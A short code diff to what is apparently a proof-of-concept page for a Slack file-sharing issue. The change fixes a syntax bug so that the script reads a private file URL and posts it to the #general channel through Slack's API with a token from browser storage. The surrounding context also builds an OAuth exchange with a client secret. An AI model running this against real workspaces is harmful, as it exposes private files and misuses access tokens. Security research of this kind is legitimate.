--- a/file-share-poc.html
+++ b/file-share-poc.html
@@ -27,7 +27,7 @@ var data = "code="+code+"&client_id="+client_id+"&client_secret="+client_secret;
 
 function post_message(){
 	
-	var url = document.getElementsByName["private_file_url"][0].value;
+	var url = document.getElementsByName("private_file_url")[0].value;
 	
 	fetch("https://slack.com/api/chat.postMessage?channel=%23general&text="+url+"&token="+localStorage.getItem("token")).then(
 		resp => resp.json()).then((json) => {
